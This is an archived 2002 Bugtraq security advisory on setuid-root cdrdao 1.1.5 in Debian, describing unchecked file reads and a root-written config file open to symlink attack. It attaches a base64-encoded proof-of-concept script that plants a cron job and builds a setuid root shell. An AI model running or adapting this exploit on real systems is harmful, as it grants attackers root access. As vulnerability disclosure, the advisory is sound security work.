[23827] in bugtraq
cdrdao insecure filehandling
daemon@ATHENA.MIT.EDU (Jens Steube)
Mon Jan 14 15:06:22 2002
To: bugtraq@securityfocus.com
Message-ID: <1010876960.3c40c220caef8@troja.dnsalias.org>
Date: Sun, 13 Jan 2002 00:09:20 +0100 (CET)
From: Jens Steube <jsteube@lastflood.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="-MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0"
---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
--[ Description ]--
There are several security-related Bugs in the distributed
Debian (SID) Package of CDRDAO, a program to write audio or mixed
mode CD-Rs in disk-at-once mode. /usr/bin/cdrdao is setuid-Root
by default.
--[ Version ]--
Name: Cdrdao
Version: 1.1.5
Autor: Andreas Mueller <andreas@daneb.de>
--[ Impact ]--
Local users can gain unauthorized root access to the system.
--[ Legal ]--
The information in this advisory may be distributed or
reproduced, provided that the advisory is not modified in any way.
The Autor makes no warranties of any kind to the information
contained in this security advisory.
--[ Bugs ]--
Cdrdao doesnt check for permissions when it trys to open a file
as its "toc-file". So it was possible to open all Files on the
System, but it skips the Output on its Error-Message. Maybe it is
possible to trick to read all these Files. As i tested around to
trick i found another Bug.
This more important Bug is that cdrdao can also write a
configfile which is written to "$HOME/.cdrdao". it is written by
the Root-User and not as the User who starts cdrdao. It is possible
to include data on the written configfile and so it is possible to
gain root via a symlink-attack on $HOME/.cdrdao
After i found these Bugs i stopped to search for more Bugs.
--[ Fix ]--
Not tried to fix.
The Autor, the Debian Package Maintainer and the Debian
Bugtracking System (#127930) where informed one week before
this Post, but there was no response.
--[ Tested on ]--
Debian GNU/Linux SID on i386, installed gcc and running cron
--[ Credits ]--
Found and exploited by Jens "atomi" Steube.
Greets go out to: impulse, symbiont, mot, para, sharkking, kartan
and all other friend on #altoetting and #perl.de on ircnet.
--[ Proof of concept exploit ]--
The attached exploit is designed for the Debian (SID) Package
and not tested on other Systems.
Regards,
Jens Steube
jsteube@lastflood.com
---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0
Content-Type: application/octet-stream; name=; name="cdrdaohack.sh"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="cdrdaohack.sh"
IyEvYmluL2Jhc2gKCiMjIGNkcmRhb2hhY2suc2ggYnkgSmVucyAiYXRvbWkiIFN0ZXViZQoKUk9P
VEVYRUNESVI9Ii9ldGMvY3Jvbi5kL2NkciIKQ0RSREFPPSIvdXNyL2Jpbi9jZHJkYW8iClVTRVJD
T05GPSIkSE9NRS8uY2RyZGFvIgoKZWNobyAiVGVzdGluZyAkQ0RSREFPIgppZiBbICEgLXUgJENE
UkRBTyBdOyB0aGVuCiAgZWNobyAiRVJST1I6ICRDRFJEQU8gaXMgbm90IHNldHVpZCBvciBkb2Vz
IG5vdCBleGlzdCIKICBleGl0IDEKZmkKCmVjaG8gIkdlbmVyYXRpbmcgSGVscGVyIEZpbGVzIgoK
Y2F0ID4gL3RtcC9kYW9zaC5jIDw8IEVPRgppbnQgbWFpbiAoKSB7IApzZXR1aWQoMCk7IHNldGdp
ZCgwKTsKdW5saW5rKCIvdG1wL2Rhby5zaCIpOwp1bmxpbmsoIi90bXAvZGFvc2guYyIpOwp1bmxp
bmsoIi9ldGMvY3Jvbi5kL2NkciIpOwp1bmxpbmsoIiRIT01FLy5jZHJkYW8iKTsKZXhlY2woIi9i
aW4vYmFzaCIsImJhc2giLCItaSIsMCk7Cn0KRU9GCgpjYXQgPiAvdG1wL2Rhby5zaCA8PCBFT0YK
Y2MgLW8gL3RtcC9kYW9zaCAvdG1wL2Rhb3NoLmMgPi9kZXYvbnVsbCAyPiYxCmNob3duIHJvb3Qg
L3RtcC9kYW9zaCA+L2Rldi9udWxsIDI+JjEKY2hncnAgcm9vdCAvdG1wL2Rhb3NoID4vZGV2L251
bGwgMj4mMQpjaG1vZCA2NzU1IC90bXAvZGFvc2ggPi9kZXYvbnVsbCAyPiYxCmV4aXQgMApFT0YK
CmNobW9kIDcwMCAvdG1wL2Rhby5zaAoKZWNobyAiQmFja2luZyB1cCBvcmlnaW5hbCAkVVNFUkNP
TkYgZmlsZSB0byAkVVNFUkNPTkYub3JpZyIKbXYgJFVTRVJDT05GICRVU0VSQ09ORi5vcmlnID4v
ZGV2L251bGwgMj4mMQoKZWNobyAiQ3JlYXRpbmcgU3ltbGluayBvbiAkVVNFUkNPTkYgdG8gJFJP
T1RFWEVDRElSIgpsbiAtcyAkUk9PVEVYRUNESVIgJFVTRVJDT05GCgplY2hvICJFeGVjdXRpbmcg
JENEUkRBTyIKCiRDRFJEQU8gd3JpdGUgLS1zYXZlIC0tZGV2aWNlICcKKiAqICogKiAqIHJvb3Qg
L3RtcC9kYW8uc2ggPi9kZXYvbnVsbCAyPiYxCiMnIC0tYnVmZmVycyAnCicgLiA+L2Rldi9udWxs
IDI+JjEKCmVjaG8gIldhaXRpbmcgZm9yIFJvb3RzaGVsbCwgd2FpdCBhdCBsZWFzdCAzIG1pbnV0
ZXMiCndoaWxlIFsgISAtdSAvdG1wL2Rhb3NoIF07IGRvCiAgZWNobyAtbiAiLiIKICBzbGVlcCAx
CmRvbmUKCmVjaG8KZWNobyAiRW50ZXJpbmcgUm9vdHNoZWxsIGFuZCByZW1vdmluZyBIZWxwZXIg
RmlsZXMiCmVjaG8gIkhhdmUgUGh1biA6LSkiCi90bXAvZGFvc2gKCg==
---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0--
